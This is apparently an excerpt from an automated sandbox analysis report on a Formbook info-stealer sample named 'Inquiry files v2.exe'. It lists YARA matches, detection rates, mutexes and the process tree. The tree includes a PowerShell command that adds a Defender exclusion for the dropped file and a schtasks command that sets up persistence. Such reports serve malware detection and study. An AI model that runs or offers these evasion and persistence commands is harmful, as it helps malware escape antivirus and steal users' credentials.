                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F516C7_2_012F516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0138B16B7_2_0138B16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AF1727_2_012AF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012CB1B07_2_012CB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137F0E07_2_0137F0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013770E97_2_013770E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C70C07_2_012C70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0136F0CC7_2_0136F0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137132D7_2_0137132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012AD34C7_2_012AD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0130739A7_2_0130739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C52A07_2_012C52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013612ED7_2_013612ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DB2C07_2_012DB2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013775717_2_01377571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135D5B07_2_0135D5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013895C37_2_013895C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137F43F7_2_0137F43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012B14607_2_012B1460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137F7B07_2_0137F7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013056307_2_01305630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013716CC7_2_013716CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_013559107_2_01355910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C99507_2_012C9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DB9507_2_012DB950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0132D8007_2_0132D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C38E07_2_012C38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137FB767_2_0137FB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DFB807_2_012DFB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01335BF07_2_01335BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012FDBF97_2_012FDBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01333A6C7_2_01333A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01377A467_2_01377A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137FA497_2_0137FA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01305AA07_2_01305AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01361AA37_2_01361AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0135DAAC7_2_0135DAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0136DAC67_2_0136DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01377D737_2_01377D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C3D407_2_012C3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01371D5A7_2_01371D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012DFDC07_2_012DFDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01339C327_2_01339C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137FCF27_2_0137FCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137FF097_2_0137FF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0137FFB17_2_0137FFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C1F927_2_012C1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01283FD27_2_01283FD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01283FD57_2_01283FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012C9EB07_2_012C9EB0
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_00884B019_2_00884B01
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_0088D5BC9_2_0088D5BC
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06BE5EA09_2_06BE5EA0
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06BEDEB99_2_06BEDEB9
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06BEDEC89_2_06BEDEC8
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06BE5C309_2_06BE5C30
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06BE5C409_2_06BE5C40
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FC37379_2_06FC3737
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FCB4499_2_06FCB449
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FC2D709_2_06FC2D70
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FCCBAD9_2_06FCCBAD
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FC82D89_2_06FC82D8
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FC62809_2_06FC6280
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FC5E489_2_06FC5E48
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FC2D619_2_06FC2D61
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FC5A109_2_06FC5A10
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FCE9D89_2_06FCE9D8
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_06FC79289_2_06FC7928
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_0702CCD09_2_0702CCD0
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exeCode function: 9_2_0702CCC09_2_0702CCC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016E010013_2_016E0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0173600013_2_01736000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_017702C013_2_017702C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F053513_2_016F0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F077013_2_016F0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0171475013_2_01714750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016EC7C013_2_016EC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0170C6E013_2_0170C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0170696213_2_01706962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F29A013_2_016F29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F284013_2_016F2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016FA84013_2_016FA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0171E8F013_2_0171E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016D68B813_2_016D68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0172889013_2_01728890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016EEA8013_2_016EEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016FED7A13_2_016FED7A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016FAD0013_2_016FAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016EADE013_2_016EADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F8DC013_2_016F8DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01708DBF13_2_01708DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F0C0013_2_016F0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016E0CF213_2_016E0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01764F4013_2_01764F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01710F3013_2_01710F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01732F2813_2_01732F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016E2FC813_2_016E2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0176EFA013_2_0176EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F0E5913_2_016F0E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01702E9013_2_01702E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0172516C13_2_0172516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016DF17213_2_016DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016FB1B013_2_016FB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016DD34C13_2_016DD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F33F313_2_016F33F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0170D2F013_2_0170D2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0170B2C013_2_0170B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F52A013_2_016F52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016E146013_2_016E1460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_017374E013_2_017374E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F349713_2_016F3497
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016FB73013_2_016FB730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0170B95013_2_0170B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F995013_2_016F9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F599013_2_016F5990
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0175D80013_2_0175D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F38E013_2_016F38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01765BF013_2_01765BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0172DBF913_2_0172DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0170FB8013_2_0170FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01763A6C13_2_01763A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F3D4013_2_016F3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0170FDC013_2_0170FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01769C3213_2_01769C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01709C2013_2_01709C20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F1F9213_2_016F1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_016F9EB013_2_016F9EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 012F5130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 01307E54 appears 111 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0133F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 01737E54 appears 97 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 012AB970 appears 280 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0132EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0175EA12 appears 37 times
                Source: Inquiry files v2.exe | Static PE information: invalid certificate
                Source: Inquiry files v2.exe, 00000000.00000002.2227220590.0000000007630000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCAA.dll4 vs Inquiry files v2.exe
                Source: Inquiry files v2.exe, 00000000.00000002.2228263178.0000000008020000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Inquiry files v2.exe
                Source: Inquiry files v2.exe, 00000000.00000000.2115239904.0000000000B62000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameeFkU.exe: vs Inquiry files v2.exe
                Source: Inquiry files v2.exe, 00000000.00000002.2217061677.000000000100E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Inquiry files v2.exe
                Source: Inquiry files v2.exe, 00000000.00000002.2222224307.0000000002F71000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCAA.dll4 vs Inquiry files v2.exe
                Source: Inquiry files v2.exe | Binary or memory string: OriginalFilenameeFkU.exe: vs Inquiry files v2.exe
                Source: Inquiry files v2.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000F.00000002.3374402396.0000000001680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000010.00000002.3371782022.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000007.00000002.2580516163.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000010.00000002.3374604831.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000007.00000002.2569102143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000010.00000002.3374530028.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000F.00000002.3375661404.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000007.00000002.2571952435.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: Inquiry files v2.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: WOzeoJQi.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Inquiry files v2.exe.2f9dc88.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 0.2.Inquiry files v2.exe.2f9dc88.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 0.2.Inquiry files v2.exe.7630000.1.raw.unpack, VU5FiiciHrPuThVwBQ.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 0.2.Inquiry files v2.exe.7630000.1.raw.unpack, VU5FiiciHrPuThVwBQ.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 9.2.WOzeoJQi.exe.27bdc94.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 9.2.WOzeoJQi.exe.27bdc94.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, O1URIrqBHR6xNO4emT.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, dXvfmhcjUU1IvInRn0.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, dXvfmhcjUU1IvInRn0.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, dXvfmhcjUU1IvInRn0.cs | Security API names: _0020.AddAccessRule
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@20/12@4/4
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | File created: C:\Users\user\AppData\Roaming\WOzeoJQi.exe
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5360:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe | Mutant created: \Sessions\1\BaseNamedObjects\QuBizAcdNUraaFYYPQeQ
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | File created: C:\Users\user\AppData\Local\Temp\tmp35FF.tmp
                Source: Inquiry files v2.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: WOzeoJQi.exe.0.dr | Binary or memory string: INSERT INTO [dbo].[Repairs] ([CustomerID], [ProductCode], [TechID], [DateReported], [DateRepaired], [Title], [Description]) VALUES (@CustomerID, @ProductCode, @TechID, @DateReported, @DateRepaired, @Title, @Description);
                Source: WOzeoJQi.exe.0.dr | Binary or memory string: INSERT INTO [dbo].[Customers] ([Name], [City], [State], [ZipCode], [Phone], [Email]) VALUES (@Name, @City, @State, @ZipCode, @Phone, @Email);
                Source: runas.exe, 00000010.00000002.3372111139.00000000030F5000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2893579594.00000000030D3000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000010.00000002.3372111139.0000000003126000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2893716360.00000000030F5000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2902563374.0000000003100000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Inquiry files v2.exe | ReversingLabs: Detection: 65%
                Source: Inquiry files v2.exe | Virustotal: Detection: 47%
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | File read: C:\Users\user\Desktop\Inquiry files v2.exe
                Source: unknown | Process created: C:\Users\user\Desktop\Inquiry files v2.exe "C:\Users\user\Desktop\Inquiry files v2.exe"
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WOzeoJQi.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp35FF.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Inquiry files v2.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
